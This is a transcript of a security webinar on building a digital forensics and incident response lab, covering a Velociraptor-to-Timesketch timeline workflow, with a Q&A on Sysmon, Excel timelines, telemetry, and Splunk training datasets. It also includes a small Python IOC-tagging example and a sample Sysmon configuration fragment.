And this is a really cool illustration that somebody has done on a GitLab account, but really the credit goes back to Eric Capuano and Whitney Champion.

They posted about this in the first place — I think they have a GitHub repository for it too, called velociraptor-to-timesketch. The idea is something you would also see within enterprise incident response environments, where you might use Velociraptor or an EDR to perform remote data acquisition — you just need a tool that has an agent installed on your endpoints.

Then you basically run a data acquisition, and it uploads the data automatically into a bucket, into a repository — for example here, Google Cloud Storage, where the output of the data collection lands.

And then there's some automation that automatically triggers, for example, Plaso (log2timeline) to parse the collection and create a timeline from it.

And when you have this timeline, which is usually in Plaso format — which is just a container — you need to transform it into something readable. In this case you could do CSVs, but in this automated workflow, the data population and analysis can also happen in a specific tool.

One of them, for example, is Timesketch. It's based on OpenSearch, so it has a little bit of the feel of the Elastic (ELK) stack, and it's maintained by Google.

It's a purpose-made tool for the analysis of forensic data as an incident responder. That's pretty cool.

All you need to do is log into Velociraptor and trigger the collection, and a couple of hours later your analysis tool will be populated with the data.

It could be Splunk as well; in this case, Timesketch is pretty cool. That's how you can save a lot of time and actually have a pretty consistent workflow.

Then finally, for looking at the data: this is what Timesketch looks like. It's again open source and maintained by Google.

It has a little bit of the look and feel of a SIEM. You have events, and for each event — and this is the cool part — you can actually tag them and add labels. You can see the data and the data source, and then basically collaborate as a team on the same timeline to figure out which of the events you're seeing in the analysis are malicious or suspicious.

It takes maybe a little bit of a learning curve to get the data in there. You can automatically push Plaso files into Timesketch, and it has some additional features which are really cool.

You can run Sigma rules, and you can add indicators of compromise so that it automatically tags any occurrence of an IOC anywhere in your data. And of course you can run complex searches across the data.
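That IOC-tagging behavior can be mimicked in a few lines of Python — a toy stand-in for what Timesketch does at much larger scale, with invented event fields:

```python
# Toy version of IOC tagging: every event whose message contains a known
# indicator gets tagged, so filtering on tags leaves only suspicious rows.
def tag_iocs(events, iocs):
    """Tag events in place and return only the ones that matched an IOC."""
    for e in events:
        e["tags"] = [ioc for ioc in iocs if ioc.lower() in e["message"].lower()]
    return [e for e in events if e["tags"]]

events = [
    {"message": "Outbound connection to 203.0.113.50:443", "tags": []},
    {"message": "User opened report.docx", "tags": []},
    {"message": "Process locker.exe started", "tags": []},
]
iocs = ["203.0.113.50", "locker.exe"]
print(tag_iocs(events, iocs))
```

In Timesketch the matching runs across the whole indexed timeline and the tags become a filterable column, which is what makes the "show me only tagged events" triage flow work.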

And then eventually, if you just show the tags and labels that you're interested in, you might just be left with anything that's malicious. And that's really cool, right? Because now you have a chronological order of events that are suspicious or malicious.

You can then export those, write a report on that, or do basically anything you need in terms of reporting afterwards. And the alternative, without Timesketch, is always spreadsheets.

People also always use spreadsheets, and I'm a big fan. Excel is probably still the most powerful forensics tool out there for creating timelines, and that will probably always be the case.

But this is a really cool way of doing things, when it’s part of this workflow, and I think that’s already it. So if anybody has any questions, I will stick around here and, for a couple more minutes.

You can also check out the free tutorials that are all on the Bluecape Security site. Please feel free to check out the resources that came up in the pre-session show here.

We talked about how I got into this because of the tutorials I put out there — for fun, first of all. Now it has become its own thing. You can also check out other resources, courses, things along those lines.

But yeah — and the Discord channel, if you have any questions. The tiny URL for Discord — yes, I need to look up the Discord link on my phone here.

Unfortunately, I can’t see it on my browser or on my laptop, but, Zach, please let me know if I missed anything or if there’s any questions.

Zach Hill

Yeah, for sure, man. Thank you for sharing your time with us today and sharing your knowledge — it's always appreciated. Fantastic, man. There are a few questions we got from Zoom.

I'll try to go over a couple of them. I know you're exhausted. But you gave everybody ways to contact you, so thank you for doing that.

Appreciate that. But one question I want to get to right away — and it just jumped away on me, hang on, I'm sorry — it was basically asking: is it okay to use one Kali box as both the attack and defender machine?

I don't know where that question went now.

Markus Schober

Oh, I guess that's because I added Kali as part of a potential forensic analysis system.

It's just a lab environment, so obviously anything is fair game — whatever works best for you, I think. If you use it for the attack, by the time the analysis starts, the attack stuff is already done.

You can just as well work with your Kali box if that works for you, and if you don't have enough resources to set up additional VMs within your lab environment.

Zach Hill

What was the thing that has parsers for every artifact on Windows? Is that Plaso?

Markus Schober

Log2timeline — and let's see if I can find it here.

Zach Hill

If you find that, I’ll put it in the,

Markus Schober

Just look up log2timeline on GitHub and you'll find it — or the list in my forensic workstation guide. It's a really cool approach. Basically, you run it and you can select which parsers you want to apply against a Windows disk image.

One, two, three, or all of them — and if it's all of them, a few dozen parsers will actually be applied against the Windows image that you're providing.

All the artifacts are basically put into one container as the output, and you can analyze all the artifacts in a single timeline. That can be overwhelming, because it generates a ton of data, but it's a really, really good way.

It's a little time consuming, but a good way to make sure you're not missing anything. Otherwise — awesome.

Zach Hill

Thanks, sir. Mario asked: can you please explain the difference between logs and telemetry? They say they understand logs, but are confused about telemetry regarding visibility in our environments.

Markus Schober

That's a good question. Yeah — I think when I did this presentation somewhere initially, I tried to make sure I was very explicit about that, but I wasn't today, I guess.

Logs are actually just part of telemetry, right? In my view, telemetry is any kind of event or data that you can gain information from.

It could be from the network — pcaps or network logs — or from events that are happening on Windows systems, or from actual logs.

And logs are basically just what applications decide to write, right? You do not see everything that's going on on a system; if you're just looking at logs, it's only the things the system decides to log based on its configuration.

Windows has event logs, and there's just some information in there. Web servers have logs and you can look into those. But unless they're configured accurately, you might still be missing things.

There might be additional telemetry — additional data that you might need visibility into. Not everything is in logs; you might have to capture pcaps, and networking data is a good example of additional telemetry.

Zach Hill

Thank you. Definitely. Cat Meow asks: why do you say Excel is the most powerful tool to analyze timelines?

Markus Schober

Yeah, I love building timelines in Excel. You can sort, you can filter, you can order chronologically, you can highlight certain artifacts — and this is what you do in forensics.

You just have data from a lot of different outputs. For example, speaking of Eric Zimmerman's tools: you might parse the MFT, then you might parse event logs, then you might be parsing registry data.

There are all kinds of different data that you get there, and you need to put them into one pane of glass at some point — one view.

Spreadsheets, obviously — because most outputs are CSV-based anyway, you just copy and paste, and you end up with enormous numbers of rows. That's basically how it mostly works out in the forensics world.

You put all the data into a spreadsheet timeline. And this is my favorite part: I just put all the data in there, sort it by time, and all of a sudden everything falls into place, and I can see exactly what happened when, where, and how.

And that's always pretty rewarding. Forensics people are just also Excel nerds, I guess — long story short.

Zach Hill

So, checking out YouTube — somebody was saying we're getting an error; I was just looking at that. My apologies. Thank you for that answer, man. And let's see, Michael is asking: would you recommend using EnCase, or learning it?

Markus Schober

I think it can of course be really helpful for you to learn — EnCase is very powerful. But for the most part, unless you're talking about e-discovery or something where it might really be needed, I wouldn't spend a ton of days on it for a certain investigation.

Zach Hill

Solid. Did you cover the storage space that was needed in the VMs? Tony was asking — I'm not sure if you said how much storage is needed for collecting and everything.

Markus Schober

So, storage space for the lab VMs? Yes. For just the bare minimum, you can run a Windows server and a Windows client and allocate maybe 30 GB of storage each. For the entire setup that you see right now, you definitely need 100 gigs, but that's probably already doable.

And then it depends on how you perform data collections. If you create disk images from each of these systems, every disk image automatically doubles the storage.

All of a sudden you have two images of 30 GB each, and it can become big really quickly. That's why forensic workstations actually often have to be pretty big: you have to host the disk image that you just captured from another system on your own system.

So it has to be bigger than that, of course.

Zach Hill

In the ransomware attack lifecycle, where in the process are backups detected and eliminated?

Markus Schober

That is a good question. I think it depends on whether they come across the backups manually or not — there are, I think, two options.

Either a threat actor finds out about a system or a tool that is performing backups, and they might manually target it somewhere in the post-exploitation phase — wipe them, delete them, whatever they are able to do based on the permissions, privileges, and accounts they got hold of.

Or there's ransomware that typically has the capability of deleting, for example, shadow copies. Shadow copies are the automatic backups that Windows makes of its own system so that you can go back in time if something happens.

And most ransomware these days has the capability of automatically deleting shadow copies on the Windows system it executes on.

Zach Hill

This person asked: everyone talks about Windows forensics, but nobody talks about Linux. Any reason?

Markus Schober

Yeah — because in something like 95% of my cases, it was Windows-based. Every organization runs on Windows for the most part. Obviously there are exceptions, but I'm just saying that generally, a ransomware case out there mostly involves enterprise environments that also run on Windows.

I can't even think of a single case I've worked in my life that involved a ransomware attack on a purely Mac- or Linux-based environment.

So it's just what you're dealing with for the most part.

Zach Hill

Rick, thank you, man. good question.

Markus Schober

I know it seems very, very biased for sure.

Zach Hill

do you have time for a couple more questions?

Markus Schober

Yeah, of course.

Zach Hill

All right, so if anybody has any more questions, please put them in the chat. But I'm going to finish up these last two that I see here — or the last one: from the hypervisor layer, is there some tool you would recommend to monitor the virtualization layer?

Markus Schober

I'm not sure if I understand the question right. To monitor — hypervisors are basically VirtualBox, Hyper-V, VMware, anything along those lines.

I don't know what you would monitor on the virtualization layer, so I'm not exactly sure about the question.

Zach Hill

No problem. Can we say that Sysmon will give more complete logging than just local policy logging?

Markus Schober

Oh, for sure, yeah. With Sysmon you can basically see almost everything you need to see — if you have it accurately configured.

I would take Sysmon logging over anything, anytime, because Sysmon logs so much granular information that most of the time it renders the Windows forensics process afterwards unnecessary, because you already have all the answers in Sysmon.

So as long as you have Sysmon logs for the particular timeframe of interest, almost everything is already there. Most of the time there's no need to even follow up with forensics, because you already have your answers.
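As context for how much that visibility depends on configuration: Sysmon's behavior is driven entirely by an XML config file. The fragment below is a minimal illustrative sketch, not a recommended baseline — the schema version and filters here are assumptions for illustration, and community configs such as SwiftOnSecurity's sysmon-config are the usual starting point.

```xml
<!-- Minimal illustrative Sysmon config fragment (not a recommended baseline).
     Schema version and filters chosen for illustration only. -->
<Sysmon schemaversion="4.50">
  <EventFiltering>
    <!-- Log every process creation (exclude nothing) -->
    <ProcessCreate onmatch="exclude" />
    <!-- Log only network connections to port 445 (SMB) -->
    <NetworkConnect onmatch="include">
      <DestinationPort condition="is">445</DestinationPort>
    </NetworkConnect>
  </EventFiltering>
</Sysmon>
```

Installing with a config looks like `sysmon64 -accepteula -i config.xml`; the filtering rules decide which events ever get written, which is exactly why a well-tuned config is what makes Sysmon logs so complete.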

Zach Hill

Not sure on this question: are there any certain device types — DCs, say — that you'd recommend enabling Sysmon on first?

Markus Schober

Yeah, I think I know where this question is going. Notice there's always this debate: Sysmon creates a lot of logs, it needs a lot of storage, there's a lot of data.

And especially if you ship it to the SIEM, there's always a debate about it getting expensive — too much data, we don't need that. So there's always a back and forth about that, and every organization has to decide on its own.

But my recommendation is definitely: put Sysmon on critical systems, sensitive systems, where you really want to see if something gets compromised — somebody got access who shouldn't have, files were created or deleted, whatever. Definitely put Sysmon at least on those systems, and if you can, forward those logs to the SIEM.

If you can't, there's nothing wrong with just installing Sysmon on endpoints and not forwarding the Sysmon logs, because I would rather have a compromised system with some local Sysmon logs on it if I need them than not.

Everybody nowadays has 100 megabytes or so of spare disk to let Sysmon log locally and just have it around for a period of time.

Zach Hill

Perfect. Thank you, sir. I’m, going to take this last question here, and then if you have any more questions for Marcus, I’ll go ahead and put his discord link in the, into our discord server so you guys can, go and join that and ask him questions if you have any more.

But this is actually a pretty good question: is there any publicly available data that could be used to learn analysis using Splunk — any pre-configured data sets for that?

Perfect.

Markus Schober

Yes. let me see if I can actually dig that up here real quick.

There's a Splunk BOTS something — Splunk Boss of the SOC.

Zach Hill

Check out Splunk Boss of the SOC — is that what you said?

Markus Schober

Boss of the SOC, that's it. This is a challenge that Splunk's security team put out for years, and they actually created a ton of Splunk logs every year.

And you can download those for free from GitHub and put them into your Splunk. You can have an AWS compromise — I don't know, there are like a dozen different things you can actually look into there.

I've played around with it for a little while, and I've only scratched the surface of it, but this is — yeah, logs. I know data for training is always like the gold in our industry, right?

You need data to actually investigate something. That's why it's so tricky to learn, and that's why I wanted to do this talk — because if you have your own lab, you can create your own data, right? And this is where you have Splunk.

And if you have Sysmon, you can run Sysmon queries in Splunk. But if you want to go even further — yeah, Splunk Boss of the SOC: download the data, put it into your Splunk. It's pretty easy, you can just import it. And just knock it out.

And there are actually write-up guides out there that have the questions and answers.

Zach Hill

That's awesome. I put a link for that in the Discord chat, so if you guys want to check that out, you can find the link there. Dude, thank you — that's such an awesome resource right there.

I had no idea that existed. So that’s legit.

Markus Schober

Awesome.

Zach Hill

All right, well, thank you for being here again and sharing your time with us, Markus. Always appreciate you being here with us. You'll be joining us at Wild West Hackin' Fest in Denver and in Deadwood.

So we will also see you there. Virtual? No — you'll be in person, training in Denver. Yep.

Markus Schober

Oh, yes.

Zach Hill

Okay. Awesome. Awesome. All right, so to everybody who, was here for, the presentation, say thank you to Marcus, because we appreciate you. We love you. Thanks.

Markus Schober

You’re welcome.

Zach Hill

If you are here and you still want to ask some questions, we are going to be starting our breakout room. So if you have the Zoom application installed, at the bottom of your screen you should see a little button that says breakout rooms.

And in there, you should see Ask Antisyphon Anything. I don't believe Markus will be joining us, because he's probably really tired and wants to go to sleep.

Markus Schober

I'll get over there for a few minutes, because actually I head out later too — so I'm not taking a break here.

Zach Hill

Perfect. All right, so if you have a few remaining questions for Markus, you're more than welcome to join us. If you have any other questions related to Antisyphon training or certifications, or resume help, interview help — whatever that question might be — come join us.

Ask us anything. But until then, I guess — we'll be here next week with Dale Hobbs. So see you all next week, and I'll see you in the breakout room.